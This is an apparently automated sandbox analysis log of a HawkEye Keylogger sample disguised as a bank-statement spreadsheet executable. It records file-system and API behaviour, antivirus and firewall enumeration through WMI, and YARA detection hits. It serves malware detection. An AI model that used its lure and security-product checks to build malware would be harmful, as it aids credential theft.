                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 2_2_00405D84
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: 0_2_0046A9D0 GetSystemTime,ExitProcess,0_2_0046A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,6_2_0040724C
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: 0_2_00440BF4 GetVersion,0_2_00440BF4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.665351637.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000002.00000002.781407102.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000E.00000002.786924724.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000010.00000002.810314867.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.822009123.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000017.00000002.864676132.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.868823721.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001F.00000002.891689573.000000000019D000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.894914378.000000000019D000.00000004.00000010.sdmp Binary or memory string: avp.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.774857470.0000000006760000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.798729439.00000000008DA000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912205260.000000000077B000.00000004.00000020.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.798860254.000000000097E000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp Binary or memory string: Defender\MsMpeng.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912269653.00000000007FB000.00000004.00000020.sdmp Binary or memory string: Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                Stealing of Sensitive Information:

                Yara detected HawkEye Keylogger
                Source: Yara matchFile source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.932871258.0000000002F3A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5580, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1548, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1496, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5540, type: MEMORY
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPE
